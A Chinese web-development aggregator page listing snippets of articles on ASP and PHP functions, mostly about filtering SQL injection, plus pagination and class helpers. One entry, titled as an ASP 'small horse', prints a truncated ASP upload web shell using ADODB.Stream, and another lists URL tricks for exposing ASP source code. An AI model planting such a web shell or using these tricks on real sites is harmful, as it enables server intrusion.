一个asp函数解决SQL Injection漏洞相关文章推荐,Web开发

一个asp函数解决SQL Injection漏洞的相关文章

一个asp函数解决SQL Injection漏洞

标签：ASP

/** 作者：慈勤强 Email： cqq1978@Gmail.com */ 函数很简单，主要是针对字符串和数字两种类型的传入数据分别进行了处理，具体用法：字符类型的 strUsername = CheckInput(Request(“username“),“s“) 数字类型的 ID = CheckInput(Request(“id“),“i“) 下面是函数 Function CheckInput(str,strType) '函数功能：过滤字符参数中的单引号，对于数字参数进行判断，如果不是数值...[ 查看全文 ]

星空の月如
5 1
用PHP函数解决SQL injection

标签：PHP

SQL injection问题在ASP上可是闹得沸沸扬扬当然还有不少国内外著名的PHP程序“遇难”。至于SQL injection的详情，网上的文章太多了，在此就不作介绍。如果你网站空间的php.ini文件里的magic_quotes_gpc设成了off，那么PHP就不会在敏感字符前加上反斜杠（\），由于表单提交的内容可能含有敏感字符，如单引号（'），就导致了SQL injection的漏洞。在这种情况下，我们可以用addslashes()来解决问题，...[ 查看全文 ]

大公无私bathb
5 1
asp中的一个奇怪的函数

标签：ASP

asp中有很多的文章在研究如何提高asp程序的执行效率,我们得出结论在<% 和 % 之间的代码执行的速度要高于在这个标签之外的代码,我们有没有想过如何重复的利用这些在标签之外的代码呢？有的人可能觉得这个没有什么意义！但是我们可以怀着一种很轻松的心态来看看下面这个例子，看看我们得到了什么有趣的现象！在这个例子中，我们用到了 MSDN 中没有介绍的 WriteBlock 函数: test.asp <h...[ 查看全文 ]

yytk5456
1 1
ASP整合的一个SQL语句类

标签：ASP

我们在写ASP数据库程序的时候，通常都会用到SQL语句，而在增加数据和更新数据的时候，通常会使用一下方式：insert into message (incept,sender,title,content,sendtime,flag,issend) values ('"&incept(i)&"','"&membername&"','"&title&"','"&message&"',Now(),0,1) 当字段比较多的时候，而且更新的表比较多的时候，修改起来会比较麻烦，而且查找错误也比较困难。...[ 查看全文 ]

证监会长
3 1
一个比较实用的asp函数集合类

标签：ASP

最近迷恋上作网站了，使用asp开发，发现asp有好多的漏洞，而且在一个网站中有好多的代码是重复使用的，所以就查询了一些资料发现在asp中可以使用类的思想，所以就写了这个类，写的不好，但是比较实用。 <meta http-equiv="Content-Type" content="text/html; charset=gb2312" <% Const Btn_First="<font face='webdings'9</font" '定义第一页按钮显示样式 Const Btn_Prev="<f...[ 查看全文 ]

我叫小猴子life
1 1
完美解决一个事件激活多个函数

如果你的网页中一个“OnLoad”事件要激活两个以上的JavaScript函数，那怎么办呢？小阳曾查阅了不少资料，结果都不尽如人意，无非是程序员根据情况，把要激活的函数统一放在一个函数里激活。但作为一个程序员，编写的代码的适用性是很重要的。请看下面一个例子：运行后你会发现，它只跳出一个“这是JS脚本调用的函数”的警告框。< BODY标签中要求激活的函数被“忽略”了。当...[ 查看全文 ]

多情汉子丶
39 1
ASP漏洞集-ASP漏洞分析和解决方法

标签：ASP

1 在ASP程序后加个特殊符号，能看到ASP源程序受影响的版本： win95+pws IIS3.0 98+pws4 不存在这个漏洞。 IIS4.0以上的版本也不存在这个漏洞。问题描述：这些特殊符号包括小数点，%81, ::$DATA。比如： http://someurl/somepage.asp. http:// someurl/somepage.asp%81 http:// someurl/somepage.asp::$DATA http:// someurl/somepage.asp %2e http:// someurl/somepage %2e%4...[ 查看全文 ]

梁小军2O13
20 1
一个比较实用的asp函数集合类(1)

标签：ASP

最近迷恋上作网站了，使用asp开发，发现asp有好多的漏洞，而且在一个网站中有好多的代码是重复使用的，所以就查询了一些资料发现在asp中可以使用类的思想，所以就写了这个类，写的不好，但是比较实用。 <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <% Const Bt...[ 查看全文 ]

2678911
0 1
一个比较实用的asp函数集合类(2)

标签：ASP

'****************************** '名称: ChkInvStr '参数:Str '返回值：True/False '创建时间:2005年5月2日 '作用:检查参数是否有非法字符 '****************************** Public Function ChkInvStr(Str) Rem 定义需要过滤得非法字符 &nbs...[ 查看全文 ]

大西北小胖
0 1
一个ASP小马

标签：Web开发

%if request.QueryString("action")="log" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRe...[ 查看全文 ]

通红恭喜你
21 1
完美解决一个事件激活多个函数(2)

可是在一个页面中，我们可能会遇到有多个事件要激活多个函数，每个事件都要写一遍那样的代码，显然不是好主意。聪明的读者可能已经想到，应该写成一个函数activeMore()，哪个事件要激活多个函数的，直接就用activeMore()就行。但是在上一部分中我们把事件的toString()当作JavaScript脚步本运行，实际上是运行一段函数代码，如果写成一个函数时还是用这个方法，即为函数中嵌套函数，将会出...[ 查看全文 ]

小黑果断跳大了
6 1
一个高ai的分页函数和一个url函数

标签：PHP

这个分页函数非常高只能的看看就知道了 function ppage($total, $page, $e_page = 15, $e_block = 10, $url = '', $color = '') { if(!strpos($url,'?')) $url.='?'; else $url.='&'; if($color<'') { $color ='<font color='.$color.''; $colore = '</font'; } ...[ 查看全文 ]

埋在大众的洋芋
2 1
asp下正则实现URL自动链接的一个函数

标签：Web开发

代码如下： Function AutoLinkURLs(strString) Dim match, matches, offset, url, email, link, relnkAutoLinkURL relnkAutoLinkURL = "a href=""[[%URL%]]""[[%URLText%]]/a" If Not IsObject(regExp) Then Set regExp = New RegExp regExp.Global = True regExp.IgnoreCase = True 'Look for URLs regExp.Pattern = "(((ht|f)tps？://)|(www\.))([\w-]+\.)+[\w-:]+(/[\w- ./？%#;&=...[ 查看全文 ]

尹曦沫狂
8 1
一个目录遍历函数

标签：Web开发

一个目录遍历函数?php function dirtree($path="./test") { echo "dl"; $d = dir($path); while(false !== ($v = $d-read())) { if($v == "." $v == "..") continue; $file = $d-path."/".$v; echo "dt$v"; if(is_dir($file)) dirtree($file); &nbs...[ 查看全文 ]

了棑百叶
3 1
Advanced SQL Injection with MySQL

标签：编程语言网络编程

文/图安全天使·angel[BST] 前言我的《SQL Injection with MySQL》（《黑客防线》7月的专题）已经对MySQL的注入有了比较全面的介绍了，但是有一个危害相当大的函数，我并没有在文中提及，因为如果能灵活应用这个函数，那PHP甚至服务器的安全性均会大打折扣，由于《SQL Injection with MySQL》的发表时间是在暑假期间，考虑到很多新手、学生和品德败坏的人乱用，所以我并没有把这个写在该文里，其实...[ 查看全文 ]

安静的恐怖分子
3 1
一个好用的分页函数

标签：Web开发

代码如下：本人原创的代码,高手看来,也许流程笨拙点,但是很实用.看者要顶啊 /*---------------------------------------------------------------// * 函数说明：分页函数 page($sql,$pagesize="30") * $sql 查询语句(除limit外，可带排序或者条件限制) * 如 select * from stu ...[ 查看全文 ]

神经小破孩
2 1
一个不错的随机函数

标签：ASP

<% Dim myarr For i = 0 To 100 Randomize no = Int((1000-1+1)*Rnd+1) For j = 0 To i If no < myarr(j) And no < "" Then j = j + 1 Else Exit For End If myarr(i) = no Next If i = 21 Then Exit For End If Next %[ 查看全文 ]

xf15254864230
2 1
如何编写一个ASP类

标签：Web开发

前几天大佛写了“ASP设计模式”，可能有些初学者或者刚刚接触ASP的朋友不一定完全看得明白，偶就整理了一下编写一个ASP类的方法，大部分是从网上找来的。希望对朋友们有帮助。《ASP设计模式》(作者我佛山人)： dispbbs.asp?boardID=20&ID=247879 首先ASP的类是由事件和方法（它们就是构成类的成员了）构成的，如果大家还没有接触过，可以先看看下面的说明：在 Class 块中，成员通...[ 查看全文 ]

相偎0811
9 1
SQL注入天书之ASP注入漏洞全接触

标签：Web开发

引言随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。 SQL注入是从正常...[ 查看全文 ]

时间慢慢漂泊
3 1
一个用c#写的扫描asp源码漏洞的应用程序

这儿就是昨天说的那个程序主要部分的源代码，如果要全部代码请到我的主页去下载。贴不开，分两次。 //-------------------------------------------------------------------------- // // file name : form1.cs // // description : 主form // // date: 2001/1/3 // // author : bigeagle@163.net // http://bigeagle.yeah.net // // history : 2000/1/3 version 0.9 // // ToDo: translate:f 方法似乎...[ 查看全文 ]

来这打打酱油
44 1